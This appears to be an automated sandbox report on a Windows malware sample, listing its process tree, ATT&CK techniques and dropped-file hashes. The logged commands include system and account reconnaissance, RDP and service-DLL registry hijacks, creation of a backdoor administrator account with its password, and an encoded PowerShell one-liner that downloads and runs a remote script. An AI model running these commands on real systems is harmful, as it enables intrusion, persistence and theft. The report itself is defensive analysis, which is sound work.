PID 2776 wrote to memory of 3520	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 492	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 492	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1752	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1752	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 2848	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 2848	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 3236	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 3236	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 3876	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 3876	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1164	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1164	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 820	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 820	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 2888	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 2888	2776	cmd.exe	WMIC.exe
PID 2264 wrote to memory of 1312	2264		CFF1.exe
PID 2264 wrote to memory of 1312	2264		CFF1.exe
PID 2776 wrote to memory of 1316	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1316	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 2976	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 2976	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1728	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1728	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 3588	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 3588	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1540	2776	cmd.exe	WMIC.exe
PID 2776 wrote to memory of 1540	2776	cmd.exe	WMIC.exe
PID 1312 wrote to memory of 2836	1312	CFF1.exe	powershell.exe
PID 1312 wrote to memory of 2836	1312	CFF1.exe	powershell.exe
PID 2776 wrote to memory of 736	2776	cmd.exe	ipconfig.exe
PID 2776 wrote to memory of 736	2776	cmd.exe	ipconfig.exe
PID 2836 wrote to memory of 3640	2836	powershell.exe	csc.exe
PID 2836 wrote to memory of 3640	2836	powershell.exe	csc.exe
PID 2776 wrote to memory of 2368	2776	cmd.exe	ROUTE.EXE
PID 2776 wrote to memory of 2368	2776	cmd.exe	ROUTE.EXE
PID 3640 wrote to memory of 764	3640	csc.exe	cvtres.exe
PID 3640 wrote to memory of 764	3640	csc.exe	cvtres.exe
PID 2776 wrote to memory of 504	2776	cmd.exe	netsh.exe
PID 2776 wrote to memory of 504	2776	cmd.exe	netsh.exe
PID 2776 wrote to memory of 1164	2776	cmd.exe	systeminfo.exe
PID 2776 wrote to memory of 1164	2776	cmd.exe	systeminfo.exe
PID 2836 wrote to memory of 820	2836	powershell.exe	csc.exe
PID 2836 wrote to memory of 820	2836	powershell.exe	csc.exe
PID 820 wrote to memory of 2596	820	csc.exe	cvtres.exe
PID 820 wrote to memory of 2596	820	csc.exe	cvtres.exe
PID 2836 wrote to memory of 968	2836	powershell.exe	powershell.exe
PID 2836 wrote to memory of 968	2836	powershell.exe	powershell.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3276

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3836

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3836 -s 916
2⤵
- Program crash
PID:2252

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3508

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3296

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2664

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2640

C:\Users\Admin\AppData\Local\Temp\d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
"C:\Users\Admin\AppData\Local\Temp\d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2368

C:\Users\Admin\AppData\Local\Temp\3218.exe
C:\Users\Admin\AppData\Local\Temp\3218.exe
1⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2208

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:896

C:\Users\Admin\AppData\Local\Temp\50CC.exe
C:\Users\Admin\AppData\Local\Temp\50CC.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1688

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
1⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\8328.exe
C:\Users\Admin\AppData\Local\Temp\8328.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\system32\cmd.exe
cmd
1⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:492

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
2⤵
PID:1752

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
2⤵
PID:2848

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
2⤵
PID:3236

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
2⤵
PID:3876

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
2⤵
PID:1164

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
2⤵
PID:820

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
2⤵
PID:2888

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
2⤵
PID:1316

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
2⤵
PID:2976

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
2⤵
PID:1728

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
2⤵
PID:3588

C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
2⤵
PID:1540

C:\Windows\system32\ipconfig.exe
ipconfig /displaydns
2⤵
- Gathers network information
PID:736

C:\Windows\system32\ROUTE.EXE
route print
2⤵
PID:2368

C:\Windows\system32\netsh.exe
netsh firewall show state
2⤵
PID:504

C:\Windows\system32\systeminfo.exe
systeminfo
2⤵
- Gathers system information
PID:1164

C:\Windows\system32\tasklist.exe
tasklist /v
2⤵
- Enumerates processes with tasklist
PID:3148

C:\Windows\system32\net.exe
net accounts /domain
2⤵
PID:3796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 accounts /domain
3⤵
PID:2564

C:\Windows\system32\net.exe
net share
2⤵
PID:4076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 share
3⤵
PID:2792

C:\Windows\system32\net.exe
net user
2⤵
PID:1752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
3⤵
PID:1844

C:\Windows\system32\net.exe
net user /domain
2⤵
PID:1096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /domain
3⤵
PID:2032

C:\Windows\system32\net.exe
net use
2⤵
PID:1164

C:\Windows\system32\net.exe
net group
2⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group
3⤵
PID:612

C:\Windows\system32\net.exe
net localgroup
2⤵
PID:764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
3⤵
PID:3940

C:\Windows\system32\NETSTAT.EXE
netstat -r
2⤵
- Gathers network information
PID:2208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\system32\route.exe" print
3⤵
PID:356

C:\Windows\system32\ROUTE.EXE
C:\Windows\system32\route.exe print
4⤵
PID:788

C:\Windows\system32\NETSTAT.EXE
netstat -nao
2⤵
- Gathers network information
PID:2764

C:\Windows\system32\schtasks.exe
schtasks /query
2⤵
PID:3988

C:\Windows\system32\ipconfig.exe
ipconfig /all
2⤵
- Gathers network information
PID:1532

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\CFF1.exe
C:\Users\Admin\AppData\Local\Temp\CFF1.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2824

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j34tpabi\j34tpabi.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3640

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE693.tmp" "c:\Users\Admin\AppData\Local\Temp\j34tpabi\CSCEB51A9D4AFF540DABFBC18CA516ABF70.TMP"
4⤵
PID:764

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5tjutfif\5tjutfif.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECAE.tmp" "c:\Users\Admin\AppData\Local\Temp\5tjutfif\CSC2710EE9381743C0894EAD7FF9DBB1B.TMP"
4⤵
PID:2596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:2684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:3592

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:3640

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:1064

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:912

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
PID:1540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2368

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
PID:3868

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:476

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:2608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1436

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:1844

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:1828

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:2904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3052

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:3864

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:3200

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:968

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:968 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1588

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:588

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:3260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:3592

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc VQXOunWs /add
1⤵
PID:1728

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc VQXOunWs /add
2⤵
PID:2520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc VQXOunWs /add
3⤵
PID:3060

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2572

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:2848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:876

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
1⤵
PID:2132

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
2⤵
PID:3580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
3⤵
PID:2368

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2660

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:2888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:3004

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc VQXOunWs
1⤵
PID:2168

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc VQXOunWs
2⤵
PID:1532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc VQXOunWs
3⤵
PID:1728

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3252

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
PID:1944

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3180

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:2444

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:760

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3440

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:3532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2252

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2888

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:820

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1944

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3404

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2120

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3616

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:504

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3218.exe
MD5
382b71b055326ddbb723e7d335540dd4

SHA1
2c6dd50491f459441c2b7ec8bc8815b7808d1b2f

SHA256
25c411b5b3f3725c0552da227012255c91078b019160f64b98338ccd99b053ea

SHA512
1342509a3e87ae210916b394a1dc6f118b302e849e70603cda8b711a596e13e0d2715cf55e5c996080482ae071f358c1414c49982482409d7f50f18413fe2f5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3218.exe
MD5
382b71b055326ddbb723e7d335540dd4

SHA1
2c6dd50491f459441c2b7ec8bc8815b7808d1b2f

SHA256
25c411b5b3f3725c0552da227012255c91078b019160f64b98338ccd99b053ea

SHA512
1342509a3e87ae210916b394a1dc6f118b302e849e70603cda8b711a596e13e0d2715cf55e5c996080482ae071f358c1414c49982482409d7f50f18413fe2f5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CC.exe
MD5
7bffbdad938e5cab5eca0012ce1a67e3

SHA1
f544f516f5855e3c26c81d4adea4295bd2ab1dca

SHA256
96701798fd053c9b597459a94d5216a7381a195191c13bd3c79eb972636319ca

SHA512
a98b0aa274b0ddcbf58f31a149fcaaba298919a17784071579acbc218d71b7b9f0ae5d802afe3d2ba9f01c9b8faebede45a17f88d19a7c262088578111960788

Download Submit
C:\Users\Admin\AppData\Local\Temp\50CC.exe
MD5
7bffbdad938e5cab5eca0012ce1a67e3

SHA1
f544f516f5855e3c26c81d4adea4295bd2ab1dca

SHA256
96701798fd053c9b597459a94d5216a7381a195191c13bd3c79eb972636319ca

SHA512
a98b0aa274b0ddcbf58f31a149fcaaba298919a17784071579acbc218d71b7b9f0ae5d802afe3d2ba9f01c9b8faebede45a17f88d19a7c262088578111960788

Download Submit
C:\Users\Admin\AppData\Local\Temp\5tjutfif\5tjutfif.dll
MD5
03a121865002a523266e5a8d2968eca4

SHA1
4469fe9be1e8f4d5c7fccb24fa029a3d1d8a1d2b

SHA256
76b4d4d54c34c2ddec220a5002e5084c10131588737c6f8de81100c3ce22d689

SHA512
40522ad9790feadfc7da811032fa00e40a70dad27e069a5d961eef08bd529537beab15982a962f3513e09edb0f5efcf8defd9a084b8c1713304ca72521160765

Download Submit
C:\Users\Admin\AppData\Local\Temp\8328.exe
MD5
3907798e2cb7c0ceae0af30013311467

SHA1
4e300357564703c96702d786a0abd01d5818e3a5

SHA256
921dfc7cfaa1c4f07629465e0f18bed116927ab494bee8beae6a3ec6cfc62c8d

SHA512
d1b292565908e0b91a9f8750043eacc4bd8b5a9bd5d3dbec4e93b37d6dce96ed3f4236808efb9b53c2bcabb1952495f8e2c73679fc19455a5866a136424c94ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\8328.exe
MD5
3907798e2cb7c0ceae0af30013311467

SHA1
4e300357564703c96702d786a0abd01d5818e3a5

SHA256
921dfc7cfaa1c4f07629465e0f18bed116927ab494bee8beae6a3ec6cfc62c8d

SHA512
d1b292565908e0b91a9f8750043eacc4bd8b5a9bd5d3dbec4e93b37d6dce96ed3f4236808efb9b53c2bcabb1952495f8e2c73679fc19455a5866a136424c94ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\CFF1.exe
MD5
7faddf1721f8f471bcbbd735e4032e1a

SHA1
9e1aadf3e0cd2642365599236e2dd9eaf1ab9aa9

SHA256
4a6a29e358327ac53ec209cfa4e32d73286413bdeaa2da4c80b8109b7906de5c

SHA512
cf55867f2995be8ae4c6083bd9d1972630f4ab2435f65918ca9510d356c64a3b043fdc90d0ccc4c03c0144bcbd70c8bf01ede271c9b0663bd2ae9f8c0e7ccc53

Download Submit
C:\Users\Admin\AppData\Local\Temp\CFF1.exe
MD5
7faddf1721f8f471bcbbd735e4032e1a

SHA1
9e1aadf3e0cd2642365599236e2dd9eaf1ab9aa9

SHA256
4a6a29e358327ac53ec209cfa4e32d73286413bdeaa2da4c80b8109b7906de5c

SHA512
cf55867f2995be8ae4c6083bd9d1972630f4ab2435f65918ca9510d356c64a3b043fdc90d0ccc4c03c0144bcbd70c8bf01ede271c9b0663bd2ae9f8c0e7ccc53

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE693.tmp
MD5
19f86cbb79e193910ee011eb92918b9b

SHA1
1997773ec5b6183e3bafe3646fa7ae654680c161

SHA256
ec8b3eb9f6671efb5a143cafc4f579d67072194dfd8a700192fb658940d68cc2

SHA512
bf66047ddd974e494d3ec47fe23a5cb338b7cf5c09afa2a8d04b94a49743951375b6e925621275d792eeea7ac84f115801136d444dd0043ed95c020f5e3cc17c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESECAE.tmp
MD5
66cbc8e8e056e05f07a2eb5f392bd762

SHA1
852879365dd644a0a88763ee0e44d8a316845e0b

SHA256
91e45c256bbb7fe0bc39df3d75867f45b7932dd4fc1d5b741afc89e41f08a5a1

SHA512
fabaf35bdfc0f39aa80ae03dbf56e91964114ec48fb30f6f856539d50257e734e971e22bf9953340adc1393c2e98e7f54fd2408d3d78398a50a3f5ad1f08278b

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5
df87d6d93b1ec74fc876c6b46e408d37

SHA1
1ba00c449d9132e6a481a98c5c98654c49e41352

SHA256
25fc99f93932f10299fbe3b9ee2cad331f9d6ada033e6ade943b8d779f4dfe7d

SHA512
130990d37a35a53e361a8f973b0e952dbd00763f3b8dbcc4fc83998b064e7433ee6256fc321c230ddcd6c166f3562e40b16c91f2a3d74775534b59075c10a692

Download Submit
C:\Users\Admin\AppData\Local\Temp\j34tpabi\j34tpabi.dll
MD5
3d3a9c7c269cd56e0836cc7a1cbb7dd6

SHA1
9090cc93f0f9526f732ed2dd3aac4eb1be695bd5

SHA256
bff83d5554a677a51ab2ea5ddcf28a92fbc9449853d4dc28aff8544b6bb2f24f

SHA512
8937ea72c8cb9f449a974f5582591368c0c30dd216a987c23469a6aa81affb6dd5e0cfe347bc2ce9980a8ef961ecdbe772ebaef93ed3624b14dc1c1055e82759

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
MD5
382b71b055326ddbb723e7d335540dd4

SHA1
2c6dd50491f459441c2b7ec8bc8815b7808d1b2f

SHA256
